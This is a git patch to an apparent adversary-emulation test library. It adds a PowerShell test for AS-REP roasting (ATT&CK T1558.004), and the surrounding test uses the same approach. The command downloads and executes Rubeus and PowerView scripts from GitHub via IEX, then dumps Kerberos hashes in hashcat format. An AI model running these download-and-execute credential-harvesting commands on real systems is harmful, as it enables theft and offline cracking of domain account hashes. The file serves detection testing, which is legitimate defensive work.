From 8a910c5ed2c25fbe9d97118e64287cf181d327aa Mon Sep 17 00:00:00 2001
From: tlor89 <60741301+tlor89@users.noreply.github.com>
Date: Thu, 12 May 2022 18:33:22 -0500
Subject: [PATCH] Update T1558.004.yaml (#1961)

PowerSharpPack - Kerberoasting Using Rubeus asreproast technique via function of WinPwn

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1558.004/T1558.004.yaml | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index 165f58d1..7b86dfd4 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -56,4 +56,13 @@ atomic_tests:
     command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
-    name: powershell
\ No newline at end of file
+    name: powershell
+- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
+  description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
+      Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
+    name: powershell